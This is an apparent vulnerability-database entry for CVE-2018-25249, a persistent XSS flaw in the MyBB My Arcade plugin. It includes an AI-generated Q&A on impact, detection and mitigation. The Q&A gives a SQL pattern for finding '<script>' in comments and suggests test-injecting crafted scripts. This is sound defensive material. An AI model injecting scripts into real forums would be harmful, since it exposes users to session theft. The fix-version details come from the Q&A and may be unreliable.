CVE-2018-25249
Persistent XSS in MyBB My Arcade Plugin via Score Comments
Publication date: 2026-04-04
Last updated on: 2026-04-10
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| mybb | my_arcade | 1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2018-25249 is a persistent cross-site scripting (XSS) vulnerability found in the MyBB My Arcade Plugin version 1.3 and earlier. It allows authenticated users to inject malicious HTML and JavaScript code into arcade game score comments.
When other users view or edit these comments, the injected scripts execute, potentially compromising their security.
The vulnerability exists because the comment input field does not properly sanitize user input, enabling attackers to insert crafted scripts that persistently execute.
How can this vulnerability impact me? :
This vulnerability can impact users by allowing attackers to execute malicious scripts in their browsers when they view or edit compromised comments.
Such script execution can lead to theft of user credentials, session hijacking, defacement, or other malicious actions depending on the payload.
Because the vulnerability requires authenticated user privileges to inject scripts, it can be exploited by users with legitimate access to the forum.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by inspecting the comments in the MyBB My Arcade Plugin for the presence of malicious HTML or JavaScript code injected into arcade game score comments.
A practical approach is to search the database or web interface for suspicious script tags or unusual HTML in the comment fields.
- Use SQL queries to find comments containing script tags, for example: SELECT * FROM myarcade_comments WHERE comment LIKE '%<script>%';
- Use web application security scanners or manual testing by adding crafted comments with script tags and observing if they execute when viewed or edited.
- Monitor HTTP traffic for suspicious payloads in POST requests to the comment submission endpoints.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade the MyBB My Arcade Plugin to version 1.3.1 or later, where the vulnerability has been patched by properly sanitizing user input in the comment field.
If upgrading is not immediately possible, restrict authenticated users' ability to add or edit comments in the arcade plugin to trusted users only.
Implement web application firewall (WAF) rules to detect and block common XSS payloads in comment submissions.
Educate users to be cautious when viewing or editing arcade game score comments until the patch is applied.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of the MyBB My Arcade Plugin persistent XSS vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.